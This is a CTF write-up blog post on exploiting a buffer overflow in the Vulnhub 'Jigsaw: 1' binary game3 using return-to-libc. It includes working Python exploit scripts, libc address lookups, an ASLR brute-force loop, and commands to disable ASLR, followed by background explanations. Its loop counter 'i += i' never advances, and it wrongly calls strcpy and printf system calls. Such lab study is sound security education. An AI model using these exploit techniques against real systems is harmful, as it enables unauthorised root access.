Exploiting Buffer Overflow Using Return to Libc

Introduction

Recently while solving a challenge on Vulnhub.com, I came across a machine called “Jigsaw: 1” At the stage of privilege escalation, a buffer overflow challenge was presented. While researching on how this can be exploited, I came across an interesting method of buffer overflow exploitation called “Return to Libc”. While many of the online blogposts explained how this method can be leveraged to gain shell from a buffer overflow vulnerability, but my google skills were not able to find a blogpost that explained each step, in detail.

So, in this blogpost I aim to collect all the pieces of information that I collected and piece them together by means of this blogpost. Also, buffer overflow itself is a vast topic so covering every aspect of the topic is not possible in one blogpost. But being specific to using the “Return to Libc” method of exploitation I would try to cover majority the areas.

Before proceeding, this blogpost expects you to know basics of what buffer overflow is, how it occurs and basic buffer overflow exploitation. Also, a spoiler alert for the CTF machine “Jigsaw: 1’s” privilege escalation part. If you plan to do the CTF machine completely on your own and do not want it to be spoiled by my blogpost stop reading now.

The following are the topics that I’ve shortlisted which will be covered in this blogpost:

  • What is segmentation fault error?
  • What is ASLR protection?
  • How does the stack grow?
  • EBP ESP EIP registers?
  • Linux Ring architecture?
  • Role of Libc in linux.
  • What are system calls?

Without wasting any more words lets look at the exploitation. All the above-mentioned topics are covered after.

To portray a background, we have a low privileged shell and an ELF executable binary file on the victim machine which is vulnerable to buffer overflow and our ticket to gaining root shell on the victim machine. This file is named game3.

Upon running game3 we see that it accepts input, and upon submitting a long input it threw a segmentation fault error.

At this point it was almost clear that this is a buffer overflow vulnerability and we would need to exploit this in order to possibly gain root access on the server. For the same we would require some debugging capability. But unfortunately, any such tool was missing on the machine. Also, it was discovered that ASLR was enabled on the machine too, but the address changes were minimal and therefore a buffer overflow exploitation might be possible.

The next task would be to transfer the game3 file to our local system. For the same after some hit and trial SFTP was utilized successfully to transfer the file to our local system. Next a pattern offset of 100 letters was constructed using pattern_create.rb.

/usr/share/metasploit-framework/tools/exploit/pattern_create.rb
-l 100

The game3 program was run using gdb and the 100-letter input was provided to get our offset as 0x63413563 on the position 76.

So now we knew that the crash was occurring at position 76. Next step would be to control EIP. So, our first payload constructed was as follows.

buff = “A”*76
buff += “BBBB”
print buff

Now running the POC with gdb shows us that we gained EIP control successfully.

Next, our task would be to gain shell access using this buffer overflow. First, we are going to construct the POC for our local system and then we would construct the POC for the CTF, once we get it working on our local system. For the same we would be utilizing the “Return to libc” method of exploitation, where we would be using sys calls using the functions in libc.

Constructing POC and Gaining shell on local system

For this we would be leveraging system calls to gain shell on our local system first.

For constructing a working POC we would require 4 addresses/offsets:

  • Base Address
  • System Address
  • Exit Address
  • /bin/sh Address

Before acquiring the addresses, we would first turn off the ASLR protection on our local system.

echo 0 > /proc/sys/kernel/randomize_va_space

For acquiring the base address, we can use ldd command on our game3 binary. For the system and exit addresses we can use readelf command to search the libc.so.6 library and grep the system and exit addresses respectively, and last, we can run the strings command and grep out the /bin/sh offset. These commands are as follows:

ldd game3
strings -a -t x /lib/i386-linux-gnu/libc.so.6 | grep /bin/sh
readelf -s /lib/i386-linux-gnu/libc.so.6 | grep system
readelf -s /lib/i386-linux-gnu/libc.so.6 | grep exit

Thus, the following are the addresses that we were able to collect:

  • Base Address = 0xb7dd4000
  • /bin/sh offset = 0x0017eaaa
  • System offset = 0x0003eb40
  • Exit offset = 0x00031b40

Once we have these addresses, we can now proceed and construct our payload for running on our local system and gain a shell. Before we do that a little background on why we need these addresses. User space in linux utilize system calls to interact with the kernel space. Libc are collection of C libraries which have system functions for interacting with kernel. Being in the user space we cannot directly call functions that can interact with the kernel, in such cases we can utilize the system calls present in the libc libraries to serve our purpose. Thus, first we found the base address of the libc library that our binary (game3) is utilizing for running itself. Next we found the offsets of other addresses so that we can find the main address by adding the base address to the offset. Any logical address has two parts namely segments and offsets. The offset displays distance from our base address. Thus, when we add the base address to our offset, we will receive the actual address to where the function resides. Of Course, this is just a short summary of how things proceed to give us a shell using the below POC.

import struct
base = 0xb7dd4000
binsh = 0x0017eaaa
syst = 0x0003eb40
exit = 0x00031b40
syst_final = struct.pack("<I", base+syst)
binsh_final = struct.pack("<I", base+binsh)
binsh_final = struct.pack("<I", base+binsh)
exit_final = struct.pack("<I", base+exit)
buff = "A" * 76
buff += syst_final
buff += exit_final
buff += binsh_final
print buff

Running the above exploit gave us the sh shell on our local system.

Constructing POC and Gaining shell on the CTF

Using the same concept, we first extracted the required addresses/offsets.

So, our gained addresses were as follows:

  • Base Address = 0xb75e0000
  • System Offset = 0x00040310
  • Exit Offset = 0x00033260
  • /bin/sh Offset = 0x00162d4c

Next, we would construct our final exploit code for gaining a shell on the CTF machine. The only catch this time is that ASLR protection is enabled here and we cannot expect our addresses to remain the same every time we run the exploit code. Therefore, we would be using a loop to run our code until the required addresses are matched and we gain a root shell.

 from subprocess import call
 import struct
  
 base = 0xb75e0000
 syst = 0x00040310
 exit = 0x00033260
 binsh = 0x00162d4c
  
 syst_final = struct.pack("<I", base+syst)
 exit_final = struct.pack("<I", base+exit)
 binsh_final = struct.pack("<I", base+binsh)
  
 buf = "A" * 76
 buf += syst_final
 buf +=exit_final
 buf += binsh_final
  
 i=0
 while (i<50):
   print "Try: %s" %i
   print buf
   i += i
   ret = call(["/bin/game3", buf]) 
   

Finally, we ran our code and after some iterations, a root shell was gained successfully.

Key Concepts

What is a segmentation fault (core dump) error?

A segmentation fault is a run time error that is thrown when a program tries to access a memory location that it is not allowed to access. Which basically means that your program tried to access a memory location that was not allocated to it and was beyond its access. These limitations are usually allocated to your program by the operating system.

Further Reading

http://web.mit.edu/10.001/Web/Tips/tips_on_segmentation.html

https://www.geeksforgeeks.org/core-dump-segmentation-fault-c-cpp/

What is ASLR protection?

ASLR is an abbreviation Address Space Layout Randomization. ASLR is specifically used to protect against buffer overflow exploitation. Many of the buffer overflow exploitation relies on addresses where the instructions are loaded. Once the attacker can get a hold of these addresses, they can use buffer overflow exploitation to hijack EIP registers and point the next address to jump to finally leading to an escalated access on the operating system or other intended outcomes. What ASLR does is each time when an instruction is loaded it makes sure the instruction is loaded on a different random address space. Of course, there are other protection techniques against buffer overflow exploitation, but ASLR is what is relevant to this blogpost.

In modern kernels the ASLR’s randomize_va_space value is set to 2 by default. To disable the same the value can be set to 0. The same value can also be supported to “1” in order to enable ASLR. As in old kernels the value “2” might not be supported.

echo 0 > /proc/sys/kernel/randomize_va_space

systl command can also be used to do the same

sysctl -w kernel.randomize_va_space=0

Further Reading

https://searchsecurity.techtarget.com/definition/address-space-layout-randomization-ASLR

https://www.howtogeek.com/278056/what-is-aslr-and-how-does-it-keep-your-computer-secure/

How does the stack grow?

Usually, the growth of the stack depends on the type of processor a program is running on. For the sake of this blogpost and without deviating much from our topic we need to keep in mind that the stack grows downwards. When we say that the stack grows downwards what it means is that the base of the stack has the highest address in the memory and once data is pushed in the stack the top of the stack will always possess the lowest memory address.

A push instruction is used to add data to the stack and a pop instruction is used to remove the data from the stack. A very basic representation of stack is shown in the image below.

Further Reading

https://stackoverflow.com/questions/664744/what-is-the-direction-of-stack-growth-in-most-modern-systems

What are EBP, ESP and EIP registers?

EBP, ESP and EIP are all register pointers and always point to a certain position on the stack. These pointers store certain address in the memory inside the stack.

EBP stands for Extended Base Pointer and as the name states it always points or holds the address to the base or the bottom of the stack. Base of the stack being the highest memory address in the stack.

ESP stands for Extended stack pointer and always points or holds the address for the top of the stack. Top of the stack is the lowest memory address on the stack.

EIP stands for Extended Instruction Pointer and always points or holds the address for the next instruction to be executed.

Further Reading

https://payatu.com/understanding-stack-based-buffer-overflow/

Linux’s Usage of Ring Architecture.

It is important to know a CPU chip is built to follow below showed ring architecture. In which ring 0 is for the kernel space and Ring 3 is for the Userspace. Ring 1 and 2 are not utilized by Linux and therefore we won’t be discussing that here.

Each ring has its own sets of privileges and therefore are allowed or not allowed to perform certain operations. Here the ring 0 or the kernel space has the highest privileges and is able to perform any task. Whereas the User Space in ring 3 has the lowest privileges. As the name suggests this is the space where any user of the operating system operates.

To perform activities such as reading or writing in the memory and other privileged activities the user space must use System Calls to tell kernel space to perform these operations. System Calls basically act as APIs between user space and the kernel space, using which a user space can inform kernel space to perform certain tasks. Now of course the user space has a set of permissions defined by the operating system, defining what and when a system call can be used to call upon kernel space for performing requested operations.

Further Reading

https://stackoverflow.com/questions/18717016/what-are-ring-0-and-ring-3-in-the-context-of-operating-systems

Role of Libc in Linux.

Now that we know what system calls are, we can now get an overview of what libc is. Libc is a C library containing numerous C functions. Many (but not all) of these functions are system calls, such as strcpy() and printf etc. Thus, for this topic all we need to know is that libc provides us the capability to use system calls through its library of functions in libc. In modern linux systems this library can be found at location

/lib/i386-linux-gnu/libc.so.6

Further Reading

https://stackoverflow.com/questions/11372872/what-is-the-role-of-libcglibc-in-our-linux-app

  •  
  •  
  •  
  •  
  •  
  •  
  •